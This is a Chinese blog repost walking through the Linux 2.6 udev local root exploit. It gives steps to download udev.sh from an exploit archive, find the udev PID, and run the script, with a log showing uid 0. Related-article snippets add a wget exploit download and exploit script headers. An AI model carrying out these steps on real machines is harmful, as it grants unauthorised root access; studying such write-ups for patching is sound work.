udev漏洞,普通用户变root

最新推荐文章于 2021-05-16 12:18:54 发布
转载 最新推荐文章于 2021-05-16 12:18:54 发布 · 68 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/461558

本文介绍如何在Linux环境下创建test账户,并通过下载并运行udev.sh脚本实现从普通用户提升到root权限的过程。文章提供了获取udev进程ID的方法及运行脚本的具体步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. 在LINUX目录下建立test 帐户
2.下载udev.sh脚本 在 http://milw0rm.com/exploits/8478
3.查看UDEV的PID  
方法一:
先cat /proc/net/netlink 
ffff810077587400 15  364    ffffffff 0        0        0000000000000000 2
ffff810037f81000 16  0      00000000 0        0        0000000000000000 2
ffff810077078400 18  0      00000000 0        0        0000000000000000 2
那个364就是 UDEV的进程,如果出现很多不知道哪一个用方法2
方法二:
另外最好通过ps aux | grep udev获取pid 为365,然后再-1,把这个参数传给A脚本
然后在test 用户的当前目录 里
按以下步骤运行
[haha@localhost ~]$ id
uid=501(haha) gid=502(haha) groups=502(haha)
[haha@localhost ~]$sh udev.sh 364
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.1# id
uid=0(root) gid=0(root) groups=502(haha)
此时的UID 变为0了 ,test用户已经变为 ROOT用户

附件:http://down.51cto.com/data/2360882



    本文转自eyjian 51CTO博客,原文链接:http://blog.51cto.com/mooon/909417,如需转载请自行联系原作者



Android中可以获取root权限的两种漏洞分析
feng7208485的专栏
03-13 3071
Android获取root漏洞有两个——udev 漏洞和adb setuid exhaustion 攻击,我将分别作出介绍。并且依据udev漏洞制作了破解手机root权限的简单软件。 adb setuid exhaustion 攻击 在介绍这种攻击方法的时候,首先要了解adb的概念,简而言之adb是android sdk里的一个工具, 用这个工具可以直接操作管理android模拟器或者真实的
CentOS 7 搭建 docker+vulhub(漏洞测试靶场)
W0W
08-16 1688
CentOS 7 安装Vulhub(漏洞测试靶场)一、安装Docker1.一键安装Docker2.手工安装Docker3.Docker加速器配置Docker镜像站LinuxmacOSWindows二、安装docker-compose1.安装Python32.安装PIP3.安装docker-compose三、下载Vulhub四、启动环境五、漏洞测试六、移除环境七、配置要求 本文为结合各位大佬博客制作的安装vulhub个人日记版 其中涉及到的引用资料链接如下: vulhub官网: https://vulhub.
udev:Linux里严重的本地安全漏洞
qdujunjie的专栏
03-25 2103
转自:http://www.ha97.com/1002.html 经过验证,我个人认为udev漏洞是linux有史以来最危险的本地安全漏洞,通杀X86和X64架构下N个发行版的N个大版本和子版本,影响面相当大,互联网的血雨腥风即将到来。 这个漏洞对各大企业的安全人员发起挑战,我们的软件资产管理系统是否有足够的数据支撑我们做下面的事情? 1、给哪些系统打补
udev漏洞提权过程
cnbird's blog
06-09 3178
1)下载攻击脚本:wget http://www.extmail.org/source/exploit-udev-84782)获得udev进程号执行:ps ax|grep udev|grep -v grep|awk {print $1} 获得udev进程号,然后将此数字减1作为exploit-udev-8478的参数,例如命令结果为143则参数为1423
linux 抓udev包,udev:Linux里严重的本地安全漏洞
weixin_33423069的博客
05-16 192
#!/bin/sh# Linux 2.6# bug found by Sebastian Krahmer## lame sploit using LD technique# by kcope in 2009# tested on debian-etch,ubuntu,gentoo# do a ‘cat /proc/net/netlink’# and set the first arg to thi...
linux udev漏洞演示
weixin_34177064的博客
06-01 167
Linux***之udev漏洞演示 此漏洞针对linux2.6内核,只要有普通用户权限,即可提升root权限,开始实验吧 1、复制以下代码,保存为udev.sh,并赋予可执行权限 2、#useraddtest//新建一个普通用户 3、#su-test//切换至test用户 4、#ps-ef|grepude...
mount -o loop /path/to/dm8.iso /mnt 报只有root用户才能使用option怎么解决
最新发布
03-12
嗯,用户想解决非root用户使用loop挂载ISO文件时权限不足的问题。首先,我需要回忆一下Linux中挂载设备的基本知识。通常,挂载设备需要root权限,因为这会涉及到底层的硬件操作,可能影响系统安全。但用户希望普通...
获取root权限及破解原理分析
热门推荐
wangkr的专栏
10-13 2万+
2012-03-18 17:58:45|  分类: android |字号 订阅 现在Android系统的root破解基本上成为大家的必备技能!网上也有很多中一键破解的软件,使root破解越来越容易。但是你思考过root破解的原理吗?root破解的本质是什么呢?难道是利用了Linux kernal的漏洞吗?本文将简单对root的破解原理进行分析。 网上很多
Linux学习笔记RHEL 7(五)--用户身份与文件权限、存储结构与磁盘划分(偏理论)
笑桐笔记的博客
03-30 2996
一、用户身份与能力Linux用户有三类:1.管理员 root  2.系统用户 3.普通用户在Linux系统中,UID就相当于我们的身份证号码一样具有唯一性,因此可通过用户的UID值来判断用户身份。在RHEL 7系统中,用户身份有下面这些。管理员UID为0:系统的管理员用户。系统用户UID为1~999: Linux系统为了避免因某个服务程序出现漏洞而被黑客提权至整台服务器,默认服务程序会有独立的系统...
linux内核 漏洞扫描,关于Linux 2.6 kernel udev 漏洞的检测及修补
weixin_42480540的博客
04-30 339
最近闹的很凶的Linux udev漏洞对2.6系列的CentOS/RHEL 5.x(除了5.3)都有效,而对2.4系列的则无效,对于CentOS/RHEL 4.x 经过测试,按本文攻击方法无效,但是否真的无效还有待真正高手验证!请大家必须打起12分精神。赶紧升级。ExtMail团队已经将所有我们掌控的Linux服务器(2.6 kernel,5.x 系列)全部升级完毕。以下是检测方法和升级方法,请路...
普通用户通过udev漏洞提升到root权限
ace_fei的专栏
12-06 1526
#!/bin/sh # Linux 2.6 # bug found by Sebastian Krahmer # # lame sploit using LD technique # by kcope in 2009 # tested on debian-etch,ubuntu,gentoo # do a 'cat /proc/net/netlink' # and set the first a
无密码登入系统,修改root账号密码
weixin_33698823的博客
10-14 147
如果忘了系统登入密码怎么办呢 ?那么今天我们就来解决下该问题首先开启机器按 "e" 进入如下界面再按“e” 键进入如图再 按ENTER 退回到再按“b” 重启 不用密码进入系统 执行 passwd root 修改root 密码即可 转载于:https://blog.51cto.com/xxmspace/1564142...
修改linux的root用户密码
weixin_33918114的博客
12-08 97
此文章为修改root用户的密码,教程为图片形式,为了共同学习,所以整了出来,请下载图片 图片1 图片2 修改root密码-3: 修改root密码-4: 修改root密码-4-2: 修改root密码-5: 修改root密码-5-2: 修改root密码-5-3: 修改root密码-5-4...
Udev规则及Linux下非root用户使用串口的权限设置
无专精则不能成,无涉猎则不能通
03-11 2713
系统 Ubuntu 16.04 LTS Linux下的设备使用都需要使用sudo或root用户才能打开,为了能让普通用户也能使用串口,有以下两种方法: 1、可以增加udev规则来实现,具体方法如下: sudo vim /etc/udev/rules.d/70-ttyusb.rules 增加如下内容:KERNEL==”ttyUSB[0-9]*”,MODE=”0666” 保存,重新插入USB...
亚马逊设备影子_如何查看哪些设备正在使用您的Amazon Video帐户
culul01313的博客
09-24 1127
亚马逊设备影子pixinoo/Shutterstockpixinoo /快门 Amazon Prime Video offers a wide variety of movies, TV shows, and custom content from Amazon. Whether you’ve signed in to your account on old devices or you’re l...
GCC编译漏洞_普通用户提权root
用法之妙,存乎一心。
09-11 6068
#!/bin/bash #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> #writer:Lin-credible #function: YOUR UID WILL BE ZERO!JUST EXEC IT! #MAIL: lin-credible@hotmail.com #<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
oracle 11g bug:修改普通用户密码挂住,所有客户端均连接不上,生产中断
Lixora's DB Home
10-18 2914
oracle 11g bug:修改普通用户密码挂住,所有客户端均连接不上,生产中断   FROM:http://t.askmaclean.com/thread-3248-1-1.html 环境:        Oracle 11.2.0.2 RAC  for  IBM AIX 6.1  2节点 一条简单的修改用户密码SQL语句 : alter user ** identifi
Deepin Linux 15.7在安装过程中未出现提示输入root密码的解决方法
checkerror2的博客
08-30 2010
       今天,我通过U盘进行Deepin Linux 15.7的全新安装后,在进行MySQL的安装过程中未出现输入root密码的提示,结果无论如何也无法登录MySQL,经过一番百度之后,发现这种情况下生成的相关用户名和密码都存储在【 /etc/mysql/debian.cnf 】文件中,不过这个用户名是【 debian-sys-maint 】,而密码是一串比较复杂的字符串。        ...
在Ubuntu系统中,MTK设备刷机过程中如何设置udev规则以允许非root用户使用MTK flashtool进行adb调试和固件刷新?
11-04
在Ubuntu系统中进行MTK设备的刷机操作时,设置udev规则是确保非root用户能够使用MTK flashtool进行adb调试和固件刷新的关键步骤。首先,需要在系统中安装libusb-dev依赖包以增强USB通信支持,可以通过执行`sudo apt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值